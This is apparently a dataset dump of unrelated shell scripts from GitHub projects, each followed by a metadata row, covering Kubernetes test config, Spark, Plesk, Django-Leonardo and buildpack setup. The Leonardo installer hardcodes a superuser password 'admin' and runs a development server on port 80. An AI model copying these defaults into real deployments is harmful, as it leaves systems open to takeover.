source "${KUBE_ROOT}/cluster/gce/config-common.sh"
GCLOUD=gcloud
ZONE=${KUBE_GCE_ZONE:-us-central1-b}
REGION=${ZONE%-*}
RELEASE_REGION_FALLBACK=${RELEASE_REGION_FALLBACK:-false}
REGIONAL_KUBE_ADDONS=${REGIONAL_KUBE_ADDONS:-true}
NODE_SIZE=${NODE_SIZE:-n1-standard-2}
NUM_NODES=${NUM_NODES:-3}
MASTER_SIZE=${MASTER_SIZE:-n1-standard-$(get-master-size)}
MASTER_DISK_TYPE=pd-ssd
MASTER_DISK_SIZE=${MASTER_DISK_SIZE:-20GB}
NODE_DISK_TYPE=${NODE_DISK_TYPE:-pd-standard}
NODE_DISK_SIZE=${NODE_DISK_SIZE:-100GB}
REGISTER_MASTER_KUBELET=${REGISTER_MASTER:-true}
KUBE_APISERVER_REQUEST_TIMEOUT=300
PREEMPTIBLE_NODE=${PREEMPTIBLE_NODE:-false}
PREEMPTIBLE_MASTER=${PREEMPTIBLE_MASTER:-false}
KUBE_DELETE_NODES=${KUBE_DELETE_NODES:-true}
KUBE_DELETE_NETWORK=${KUBE_DELETE_NETWORK:-true}
MASTER_OS_DISTRIBUTION=${KUBE_MASTER_OS_DISTRIBUTION:-${KUBE_OS_DISTRIBUTION:-gci}}
NODE_OS_DISTRIBUTION=${KUBE_NODE_OS_DISTRIBUTION:-${KUBE_OS_DISTRIBUTION:-debian}}
if [[ "${MASTER_OS_DISTRIBUTION}" == "coreos" ]]; then
MASTER_OS_DISTRIBUTION="container-linux"
fi
if [[ "${NODE_OS_DISTRIBUTION}" == "coreos" ]]; then
NODE_OS_DISTRIBUTION="container-linux"
fi
if [[ "${MASTER_OS_DISTRIBUTION}" == "cos" ]]; then
MASTER_OS_DISTRIBUTION="gci"
fi
if [[ "${NODE_OS_DISTRIBUTION}" == "cos" ]]; then
NODE_OS_DISTRIBUTION="gci"
fi
# By default a cluster will be started with the master on GCI and nodes on
# containervm. If you are updating the containervm version, update this
# variable. Also please update corresponding image for node e2e at:
# https://github.com/kubernetes/kubernetes/blob/master/test/e2e_node/jenkins/image-config.yaml
CVM_VERSION=${CVM_VERSION:-container-vm-v20170201}
GCI_VERSION=${KUBE_GCI_VERSION:-gci-dev-56-8977-0-0}
MASTER_IMAGE=${KUBE_GCE_MASTER_IMAGE:-}
MASTER_IMAGE_PROJECT=${KUBE_GCE_MASTER_PROJECT:-google-containers}
NODE_IMAGE=${KUBE_GCE_NODE_IMAGE:-${CVM_VERSION}}
NODE_IMAGE_PROJECT=${KUBE_GCE_NODE_PROJECT:-google-containers}
CONTAINER_RUNTIME=${KUBE_CONTAINER_RUNTIME:-docker}
GCI_DOCKER_VERSION=${KUBE_GCI_DOCKER_VERSION:-}
RKT_VERSION=${KUBE_RKT_VERSION:-1.23.0}
RKT_STAGE1_IMAGE=${KUBE_RKT_STAGE1_IMAGE:-coreos.com/rkt/stage1-coreos}
NETWORK=${KUBE_GCE_NETWORK:-e2e}
INSTANCE_PREFIX="${KUBE_GCE_INSTANCE_PREFIX:-e2e-test-${USER}}"
CLUSTER_NAME="${CLUSTER_NAME:-${INSTANCE_PREFIX}}"
MASTER_NAME="${INSTANCE_PREFIX}-master"
INITIAL_ETCD_CLUSTER="${MASTER_NAME}"
ETCD_QUORUM_READ="${ENABLE_ETCD_QUORUM_READ:-false}"
MASTER_TAG="${INSTANCE_PREFIX}-master"
NODE_TAG="${INSTANCE_PREFIX}-minion"
CLUSTER_IP_RANGE="${CLUSTER_IP_RANGE:-10.180.0.0/14}"
MASTER_IP_RANGE="${MASTER_IP_RANGE:-10.246.0.0/24}"
RUNTIME_CONFIG="${KUBE_RUNTIME_CONFIG:-}"
# Optional: set feature gates
FEATURE_GATES="${KUBE_FEATURE_GATES:-}"
TERMINATED_POD_GC_THRESHOLD=${TERMINATED_POD_GC_THRESHOLD:-100}
# Extra docker options for nodes.
EXTRA_DOCKER_OPTS="${EXTRA_DOCKER_OPTS:-}"
# Enable the docker debug mode.
EXTRA_DOCKER_OPTS="${EXTRA_DOCKER_OPTS} --debug"
SERVICE_CLUSTER_IP_RANGE="10.0.0.0/16" # formerly PORTAL_NET
# When set to true, Docker Cache is enabled by default as part of the cluster bring up.
ENABLE_DOCKER_REGISTRY_CACHE=true
# Optional: Deploy a L7 loadbalancer controller to fulfill Ingress requests:
# glbc - CE L7 Load Balancer Controller
ENABLE_L7_LOADBALANCING="${KUBE_ENABLE_L7_LOADBALANCING:-glbc}"
# Optional: Cluster monitoring to setup as part of the cluster bring up:
# none - No cluster monitoring setup
# influxdb - Heapster, InfluxDB, and Grafana
# google - Heapster, Google Cloud Monitoring, and Google Cloud Logging
# googleinfluxdb - Enable influxdb and google (except GCM)
# standalone - Heapster only. Metrics available via Heapster REST API.
ENABLE_CLUSTER_MONITORING="${KUBE_ENABLE_CLUSTER_MONITORING:-influxdb}"
# Set etcd image (e.g. 3.0.14-experimental.1) version (e.g. 3.0.14) if you need
# non-default version.
ETCD_IMAGE="${TEST_ETCD_IMAGE:-}"
ETCD_VERSION="${TEST_ETCD_VERSION:-}"
# Default Log level for all components in test clusters and variables to override it in specific components.
TEST_CLUSTER_LOG_LEVEL="${TEST_CLUSTER_LOG_LEVEL:---v=4}"
KUBELET_TEST_LOG_LEVEL="${KUBELET_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
DOCKER_TEST_LOG_LEVEL="${DOCKER_TEST_LOG_LEVEL:---log-level=info}"
API_SERVER_TEST_LOG_LEVEL="${API_SERVER_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
CONTROLLER_MANAGER_TEST_LOG_LEVEL="${CONTROLLER_MANAGER_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
SCHEDULER_TEST_LOG_LEVEL="${SCHEDULER_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
KUBEPROXY_TEST_LOG_LEVEL="${KUBEPROXY_TEST_LOG_LEVEL:-$TEST_CLUSTER_LOG_LEVEL}"
TEST_CLUSTER_DELETE_COLLECTION_WORKERS="${TEST_CLUSTER_DELETE_COLLECTION_WORKERS:---delete-collection-workers=1}"
TEST_CLUSTER_MAX_REQUESTS_INFLIGHT="${TEST_CLUSTER_MAX_REQUESTS_INFLIGHT:-}"
TEST_CLUSTER_RESYNC_PERIOD="${TEST_CLUSTER_RESYNC_PERIOD:---min-resync-period=3m}"
# ContentType used by all components to communicate with apiserver.
TEST_CLUSTER_API_CONTENT_TYPE="${TEST_CLUSTER_API_CONTENT_TYPE:-}"
# ContentType used to store objects in underlying database.
TEST_CLUSTER_STORAGE_CONTENT_TYPE="${TEST_CLUSTER_STORAGE_CONTENT_TYPE:-}"
KUBELET_TEST_ARGS="${KUBELET_TEST_ARGS:-} --max-pods=110 --serialize-image-pulls=false --outofdisk-transition-frequency=0 ${TEST_CLUSTER_API_CONTENT_TYPE}"
APISERVER_TEST_ARGS="${APISERVER_TEST_ARGS:-} --runtime-config=extensions/v1beta1 ${TEST_CLUSTER_DELETE_COLLECTION_WORKERS} ${TEST_CLUSTER_MAX_REQUESTS_INFLIGHT} ${TEST_CLUSTER_STORAGE_CONTENT_TYPE}"
CONTROLLER_MANAGER_TEST_ARGS="${CONTROLLER_MANAGER_TEST_ARGS:-} ${TEST_CLUSTER_RESYNC_PERIOD} ${TEST_CLUSTER_API_CONTENT_TYPE}"
SCHEDULER_TEST_ARGS="${SCHEDULER_TEST_ARGS:-} ${TEST_CLUSTER_API_CONTENT_TYPE}"
KUBEPROXY_TEST_ARGS="${KUBEPROXY_TEST_ARGS:-} ${TEST_CLUSTER_API_CONTENT_TYPE}"
# Optional: Enable node logging.
ENABLE_NODE_LOGGING="${KUBE_ENABLE_NODE_LOGGING:-true}"
LOGGING_DESTINATION="${KUBE_LOGGING_DESTINATION:-gcp}" # options: elasticsearch, gcp
# Optional: When set to true, Elasticsearch and Kibana will be setup as part of the cluster bring up.
ENABLE_CLUSTER_LOGGING="${KUBE_ENABLE_CLUSTER_LOGGING:-true}"
ELASTICSEARCH_LOGGING_REPLICAS=1
# Optional: Don't require https for registries in our local RFC1918 network
if [[ ${KUBE_ENABLE_INSECURE_REGISTRY:-false} == "true" ]]; then
EXTRA_DOCKER_OPTS="${EXTRA_DOCKER_OPTS} --insecure-registry 10.0.0.0/8"
fi
# Optional: Install cluster DNS.
ENABLE_CLUSTER_DNS="${KUBE_ENABLE_CLUSTER_DNS:-true}"
DNS_SERVER_IP="10.0.0.10"
DNS_DOMAIN="cluster.local"
# Optional: Enable DNS horizontal autoscaler
ENABLE_DNS_HORIZONTAL_AUTOSCALER="${KUBE_ENABLE_DNS_HORIZONTAL_AUTOSCALER:-true}"
# Optional: Install cluster docker registry.
ENABLE_CLUSTER_REGISTRY="${KUBE_ENABLE_CLUSTER_REGISTRY:-false}"
CLUSTER_REGISTRY_DISK="${CLUSTER_REGISTRY_DISK:-${INSTANCE_PREFIX}-kube-system-kube-registry}"
CLUSTER_REGISTRY_DISK_SIZE="${CLUSTER_REGISTRY_DISK_SIZE:-200GB}"
CLUSTER_REGISTRY_DISK_TYPE_GCE="${CLUSTER_REGISTRY_DISK_TYPE_GCE:-pd-standard}"
# Optional: Install Kubernetes UI
ENABLE_CLUSTER_UI="${KUBE_ENABLE_CLUSTER_UI:-true}"
# Optional: Install node problem detector.
ENABLE_NODE_PROBLEM_DETECTOR="${KUBE_ENABLE_NODE_PROBLEM_DETECTOR:-true}"
# Optional: Create autoscaler for cluster's nodes.
ENABLE_CLUSTER_AUTOSCALER="${KUBE_ENABLE_CLUSTER_AUTOSCALER:-false}"
if [[ "${ENABLE_CLUSTER_AUTOSCALER}" == "true" ]]; then
AUTOSCALER_MIN_NODES="${KUBE_AUTOSCALER_MIN_NODES:-}"
AUTOSCALER_MAX_NODES="${KUBE_AUTOSCALER_MAX_NODES:-}"
AUTOSCALER_ENABLE_SCALE_DOWN="${KUBE_AUTOSCALER_ENABLE_SCALE_DOWN:-false}"
fi
# Optional: Enable Rescheduler
ENABLE_RESCHEDULER="${KUBE_ENABLE_RESCHEDULER:-true}"
# If we included ResourceQuota, we should keep it at the end of the list to prevent incrementing quota usage prematurely.
ADMISSION_CONTROL="${KUBE_ADMISSION_CONTROL:-NamespaceLifecycle,LimitRanger,ServiceAccount,PersistentVolumeLabel,DefaultStorageClass,ResourceQuota}"
# Optional: if set to true kube-up will automatically check for existing resources and clean them up.
KUBE_UP_AUTOMATIC_CLEANUP=${KUBE_UP_AUTOMATIC_CLEANUP:-false}
# Optional: setting it to true denotes this is a testing cluster,
# so that we can use pulled kubernetes binaries, even if binaries
# are pre-installed in the image. Note that currently this logic
# is only supported in trusty or GCI.
TEST_CLUSTER="${TEST_CLUSTER:-true}"
# Storage backend. 'etcd2' supported, 'etcd3' experimental.
STORAGE_BACKEND=${STORAGE_BACKEND:-}
# OpenContrail networking plugin specific settings
NETWORK_PROVIDER="${NETWORK_PROVIDER:-kubenet}" # none, opencontrail, kubenet
OPENCONTRAIL_TAG="${OPENCONTRAIL_TAG:-R2.20}"
OPENCONTRAIL_KUBERNETES_TAG="${OPENCONTRAIL_KUBERNETES_TAG:-master}"
OPENCONTRAIL_PUBLIC_SUBNET="${OPENCONTRAIL_PUBLIC_SUBNET:-10.1.0.0/16}"
# Network Policy plugin specific settings.
NETWORK_POLICY_PROVIDER="${NETWORK_POLICY_PROVIDER:-none}" # calico
# How should the kubelet configure hairpin mode?
HAIRPIN_MODE="${HAIRPIN_MODE:-promiscuous-bridge}" # promiscuous-bridge, hairpin-veth, none
# Optional: if set to true, kube-up will configure the cluster to run e2e tests.
E2E_STORAGE_TEST_ENVIRONMENT=${KUBE_E2E_STORAGE_TEST_ENVIRONMENT:-false}
# Optional: if set to true, a image puller is deployed. Only for use in e2e clusters.
# TODO: Pipe this through GKE e2e clusters once we know it helps.
PREPULL_E2E_IMAGES="${PREPULL_E2E_IMAGES:-true}"
# Evict pods whenever compute resource availability on the nodes gets below a threshold.
EVICTION_HARD="${EVICTION_HARD:-memory.available<250Mi,nodefs.available<10%,nodefs.inodesFree<5%}"
# Optional: custom scheduling algorithm
SCHEDULING_ALGORITHM_PROVIDER="${SCHEDULING_ALGORITHM_PROVIDER:-}"
# Optional: install a default StorageClass
ENABLE_DEFAULT_STORAGE_CLASS="${ENABLE_DEFAULT_STORAGE_CLASS:-true}"
# TODO(dawn1107): Remove this once the flag is built into CVM image.
# Kernel panic upon soft lockup issue
SOFTLOCKUP_PANIC="${SOFTLOCKUP_PANIC:-true}" # true, false
|
rkouj/kubernetes
|
cluster/gce/config-test.sh
|
Shell
|
apache-2.0
| 10,760 |
#!/bin/bash
# Copyright 2021 The Verible Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Latest Python version in Xenial is 3.5. `verible_verilog_syntax.py` test
# requires at least 3.6.
echo 'deb http://ppa.launchpad.net/deadsnakes/ppa/ubuntu bionic main' | sudo tee /etc/apt/sources.list.d/deadsnakes.list
sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys F23C5A6CF475977595C89F51BA6932366A755776
sudo apt update
sudo apt install -y \
curl \
python3.9 libpython3.9-stdlib \
python3.9-distutils
sudo ln -sf /usr/bin/python3.9 /usr/bin/python3
python3 --version
|
chipsalliance/verible
|
.github/bin/install-python.sh
|
Shell
|
apache-2.0
| 1,100 |
#!/bin/bash
clear
#### Information for metadata file #######
echo "##########################################"
echo "## Plesk Extension EZ-Template Wizard ##"
echo "## created by Jamie Charleston of Plesk ##"
echo "##########################################"
echo
echo Select the OS are you building this template for?
echo "A) CentOS B) Ubuntu C) Debian D) RHEL "
read os_name
case $os_name in
a|A) osname="centos" ;;
b|B) osname="ubuntu" ;;
c|C) osname="debian" ;;
d|D) osname="rhel" ;;
esac
clear
echo Time to choose an OS version
case $osname in
centos)
echo Which Version of CentOS
echo "A)6 B)7"
read os_version
case $os_version in
a|A) osver="6" ;;
b|B) osver="7" ;;
esac
;;
debian)
echo Which Version of Debian
echo "A)7 B)8"
read os_version
case $os_version in
a|A) osver="7" ;;
b|B) osver="8" ;;
esac
;;
ubuntu)
echo Which Version of Ubuntu
echo "A)12.04 B)14.04 C)16.04"
read os_version
case $os_version in
a|A) osver="12.04" ;;
b|B) osver="14.04" ;;
c|C) osver="16.04" ;;
esac
;;
rhel)
echo Which Version of RHEL
echo "A)6 B)7"
read os_version
case $os_version in
a|A) osver="6" ;;
b|B) osver="7" ;;
esac
;;
esac
clear
echo What architecture are you building this template for?
echo "A) x86 B) x86_64 "
read os_arch
case $os_arch in
a|A) osarch="x86" ;;
b|B) osarch="x86_64" ;;
esac
clear
echo Name this application template.
echo "(No white spaces)"
read appname
clear
echo Please provide description of the application?
read description
clear
echo Please provide primary Virtuozzo Package Depenancy.
read dependancy
clear
#### Information for post-install file to install extension #######
echo Please provide the extension install url.
read extension_url
clear
echo making new directory $appname
mkdir "$appname"."$osver"."$osarch"
echo
echo changing to working directory $appname
cd "$appname"."$osver"."$osarch"
echo
echo creating "$appname".metadata file
echo
##### Create Files ######
###### Create metadata ######
echo "%osname
$osname
%osver
$osver
%osarch
$osarch
%appname
$appname
%description
$description
%packages
%packages_0
%packages_1
$dependancy " > "$appname".metadata
##### Create post-install file ######
echo creating post-install file
echo
echo "
plesk bin extension --install-url $extension_url
" > post-install
echo creating the ez-template
vzmktmpl --post-install post-install "$appname".metadata
|
Revmagi/Plesk-Extension-Virtuozzo-EZ-templates
|
PleskExtensionEZWizard.sh
|
Shell
|
apache-2.0
| 2,962 |
sudo timedatectl set-time "yyyy-MM-dd hh:mm:ss"
|
jpodeszwik/hadoop-workshop2
|
code/timedatectl.sh
|
Shell
|
apache-2.0
| 48 |
cd ~/spark-examples
rm -f *.java
export MY_APP_JAR=MY_2.10-2015.08.12.jar
export MY_DATA_DIR=hdfs:///user/root/data
export MY_AREA=test
export MY_DB_CONNECT="jdbc:oracle:thin:@192.168.1.1:1521:orcl"
export MY_USERNAME=username
export MY_PASSWORD=password
export SPARK_NUM_EXECUTORS=9
export SPARK_EXECUTOR_MEMORY=2G
./ls.sh
./remove-result-files.sh
./import-data.sh "select * from EXPORT_TABLE1 where \$CONDITIONS" TABLE1 AREA 1
./union-data.sh "dump/TABLE1:dump/TABLE2" "TABLE.all"
./tool-validate-items-splitting.sh "${MY_DATA_DIR}/${MY_AREA}/TABLE1" 10
./tool-count.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1
./tool-head.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1 10
./tool-distinct.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1 2
./tool-grep.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1 "2014-09-03"
./tool-sample.sh ${MY_DATA_DIR}/${MY_AREA}/TABLE1 0.00001
./export-data.sh TABLE1 6
|
ruoyousi/spark-examples
|
bin/commands-examples.sh
|
Shell
|
apache-2.0
| 864 |
/Applications/MATLAB_R2015b.app/bin/matlab -nodesktop -nosplash -minimize -r "cd C:\\wamp\\www; run('DataStreamEXEMarch20at314pm.m'); exit;"
|
zmbernho/FYDP
|
game/runMATLAB.sh
|
Shell
|
apache-2.0
| 140 |
#!/bin/bash
##### OPTIONS
# (required) path to .clustering file
CLUSTER_FILE_PATH=$1
CLUSTER_FILE_NAME=$(basename "$CLUSTER_FILE_PATH" ".clustering")
##### VARIABLES
# the name to give to the LSF job (to be extended with additional info)
JOB_NAME="PRIDE-CLUSTER-LOADER"
# memory limit in MGb
MEMORY_LIMIT=10000
# log file name
LOG_FILE_NAME="${JOB_NAME}-${CLUSTER_FILE_NAME}"
##### RUN it on the production LSF cluster #####
##### NOTE: you can change LSF group to modify the number of jobs can be run concurrently #####
bsub -M ${MEMORY_LIMIT} -R "rusage[mem=${MEMORY_LIMIT}]" -q production-rh6 -g /pride_cluster_loader -o /dev/null -J ${JOB_NAME} ./runInJava.sh ./log/${LOG_FILE_NAME}.log ${MEMORY_LIMIT}m -cp ${project.build.finalName}.jar uk.ac.ebi.pride.tools.cluster.loader.ClusteringFileLoader -input ${CLUSTER_FILE_PATH}
|
PRIDE-Cluster/cluster-result-importer
|
scripts/runClusterLoader.sh
|
Shell
|
apache-2.0
| 835 |
#!/bin/bash
set -e
Xvfb :10 -screen 0 1280x1024x24 &
sleep 3
cd /freedom-for-firefox
grunt test
|
freedomjs/freedom-for-firefox
|
tools/docker-entrypoint.sh
|
Shell
|
apache-2.0
| 97 |
#!/bin/bash
virtualenv -p /usr/bin/python2.7 leonardo_venv
cd leonardo_venv
. $PWD/bin/activate
pip install -e git+https://github.com/django-leonardo/django-leonardo@develop#egg=django-leonardo
pip install -r $PWD/src/django-leonardo/requirements.txt
pip install -e git+https://github.com/leonardo-modules/leonardo-store#egg=leonardo_store
pip install -r $PWD/src/leonardo_store/requirements.txt
django-admin startproject --template=https://github.com/django-leonardo/site-template/archive/master.zip myproject
export PYTHONPATH=$PWD/myproject
cd myproject
python manage.py makemigrations --noinput
python manage.py migrate --noinput
python manage.py sync_all
echo "from django.contrib.auth.models import User; User.objects.create_superuser('root', '[email protected]', 'admin')" | python manage.py shell
python manage.py runserver 0.0.0.0:80
|
amboycharlie/Child-Friendly-LCMS
|
contrib/scripts/install_store.sh
|
Shell
|
apache-2.0
| 850 |
#!/bin/sh
curl -XDELETE localhost:9200/test
curl -XPUT localhost:9200/test -d'
{
"settings" : {
"number_of_shards" : 1
},
"mappings" : {
"doc" : {
"properties" : {
"text" : { "type" : "string", "analyzer" : "standard" }
}
}
}
}'
|
flaxsearch/luwak_tests
|
compare_percolator/reset-es-test-index.sh
|
Shell
|
apache-2.0
| 357 |
#!/bin/bash
if [ -n "$TRAVIS_TAG" ]; then
./gradlew bintrayUpload -i
fi
|
scarabresearch/EmarsysPredictSDKAndroid
|
.travis/upload_to_bintray.sh
|
Shell
|
apache-2.0
| 75 |
#!/bin/bash
#set RY_RUN just to run nothing on amazon ocasionally
#DRY_RUN="--dry-run"
#check if we are root (for example running with sudo)
ROOT=$(whoami)
if [ ! "xroot" == "x$ROOT" ];
then
echo $0 requires root permissions to run.
echo please run "sudo $0"
exit 1
fi
set -x
. folders.config
function prepare_folder(){
local FOLDER=$1
mkdir -p $FOLDER
chmod -R o+rw $FOLDER
chmod -R g+rw $FOLDER
chmod o+x $FOLDER
}
prepare_folder $LOG_DIR
prepare_folder $IMPALA_TO_GO_CACHE
prepare_folder $CLUSTER_VAR_BASE
prepare_folder $KNOWN_CLUSTERS_DIR
prepare_folder $LOCK_DIR
|
ImpalaToGo/i2g-controller
|
cluster/init_required_folders.sh
|
Shell
|
apache-2.0
| 579 |
#!/usr/bin/env bash
# In order to run this you need to have epydoc (http://epydoc.sourceforge.net/) installed, which can be done
# on Ubuntu with
#
# sudo apt-get install python-epydoc
rm docs/code/*
epydoc --html -o docs/code/ --name "Jisc Publications Router - OAI-PMH endpoint" --url https://github.com/JiscPER/jper-oaipmh --graph all --inheritance grouped --docformat restructuredtext service config
|
JiscPER/jper-oaipmh
|
document.sh
|
Shell
|
apache-2.0
| 405 |
#! /bin/bash
export glibc_install="$(pwd)/sourceware/glibc/build/install"
pushd /root/github
git clone git://sourceware.org/git/glibc.git sourceware/glibc
cd sourceware/glibc
git checkout glibc-2.32
mkdir build
cd build
../configure --prefix "$glibc_install"
make -j `nproc`
make install -j `nproc`
cd install
tar -cvf ../glibc.tar .
cp /root/github/sourceware/glibc/build/glibc.tar /root/github/xunilrj/sandbox/sources/kubernetes/devtest/k8s/glibc.tar
popd
|
xunilrj/sandbox
|
sources/kubernetes/devtest/k8s/build.glibc.sh
|
Shell
|
apache-2.0
| 461 |
#!/bin/bash
###############################################################################
#
# file: update_l10n.sh
#
# Purpose: Rebuild localization po files.
#
# Note: This file is part of Termsaver-Figlet plugin, and should not be used
# or executed separately.
#
###############################################################################
#
# Copyright 2012 Termsaver
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
###############################################################################
#
# Exit on bash errors
#
#set -o nounset
set -o errexit
base_path="`pwd`/`dirname $0`/.."
cur_dir=`pwd`
locale_path="$base_path/locale"
langs="en ja pt"
function get_prop() {
# add termsaver to path for this plugin
export PYTHONPATH=$PYTHONPATH:/usr/local/share/termsaver
python -c "from figlet import constants; print constants.Plugin.$@"
}
cd $base_path
# remove build stuff (affects the seach here)
sudo rm -rfv build
for lang in $langs; do
# create dir, if applicable
d=$locale_path/$lang/LC_MESSAGES
echo "processing $d/termsaver-figlet.po ..."
mkdir -p $d
# create file if does not exist yet
omit_header="--omit-header"
new=0
if [ ! -f $d/`get_prop "NAME"`.po ]; then
touch $d/`get_prop "NAME"`.po
omit_header=
new=1
fi
# process i18n
xgettext --language=Python \
--no-wrap \
--force-po \
--join-existing \
--keyword=_ \
--force-po \
$omit_header \
--package-name="`get_prop "TITLE"`" \
--package-version=`get_prop "VERSION"` \
--output=$d/`get_prop "NAME"`.po \
`find $base_path/figlet -iname "*.py"`
# for new files, replace the charset (to avoid warnings)
if [ $new -eq 1 ]; then
sed -i 's/charset=CHARSET/charset=utf-8/' $d/`get_prop "NAME"`.po
fi
# compile po
msgfmt $d/`get_prop "NAME"`.po -o $d/`get_prop "NAME"`.mo
done
# Done!
echo "Done"
|
brunobraga/termsaver-figlet
|
extras/update_l10n.sh
|
Shell
|
apache-2.0
| 2,549 |
#!/bin/bash
#
# Bootstrap a local machine
# - install git
# - clone repo
# - update repos
# - install depencencies
#
# Date: 6-9-2014
# Author: Daniel Mikusa <[email protected]>
#
set -e
# Detect OS & Version
OS=$(cat /etc/issue | cut -d ' ' -f 1)
VERSION=$(cat /etc/issue | cut -d ' ' -f 2 | cut -d '.' -f 1,2)
# Install git
if ! hash git 2>/dev/null; then
echo "Git not installed on the local host. Attempting to install..."
if [ "$OS" == "Ubuntu" ]; then
if [ "$VERSION" == "10.04" ]; then
# Make sure we have a modern version of Git, as the version installed on Lucid
# fails to establish an SSL connection with GitHub.
# https://launchpad.net/~git-core/+archive/ubuntu/ppa
sudo apt-get update
sudo apt-get -y install python-software-properties
sudo add-apt-repository ppa:git-core/ppa
sudo apt-key adv --recv-keys --keyserver keyserver.ubuntu.com A1715D88E1DF1F24
sudo apt-get update
# for some reason ca-certificates gets bungled
# on VirtualBox after running the above. A simple reinstall fixes it.
sudo apt-get -y install --reinstall ca-certificates
fi
sudo apt-get update
sudo apt-get -y install git-core
elif [ "$CAPTURE" == "CentOS" ]; then
sudo yum install git
else
echo "Not sure about the remote OS, please manually install git."
exit -1
fi
fi
# clone repo
if [ ! -d cf-php-buildpack-binary-build-scripts ]; then
git clone https://github.com/dmikusa-pivotal/cf-php-buildpack-binary-build-scripts.git
cd cf-php-buildpack-binary-build-scripts
else
cd cf-php-buildpack-binary-build-scripts
git pull
fi
# check out right branch
VERSION=`echo $VERSION | cut -d '.' -f 1,2`
git checkout "$OS-$VERSION"
# create /home/vcap/logs
# This path is used at runtime, but is also required by some of the packages
# to exist at compile time.
# It's not actually used, other than to satisfy that requirement.
sudo mkdir -p /home/vcap/logs
# update / install dependencies
./build/install-deps.sh
# Clear output directory, gives us a fresh set of files
if [ -d output ]; then
rm -rf output/*
fi
# Build the component requested or all of them
if [ "$1" == "" ]; then
echo "Building all components."
./build/build-all.sh
else
if [ -f ./$1/build.sh ]; then
echo "Building component [$1]."
cd ./$1
./build.sh
cd ../
else
echo "Could not find component specified [$1]. Skipping."
fi
fi
# If using vagrant, move output to shared directory
if [ -d /vagrant ]; then
mkdir -p "/vagrant/output/$OS-$VERSION"
cp -R output/* "/vagrant/output/$OS-$VERSION/"
fi
|
dmikusa-pivotal/cf-php-buildpack-binary-build-scripts
|
build/run_local.sh
|
Shell
|
apache-2.0
| 2,767 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.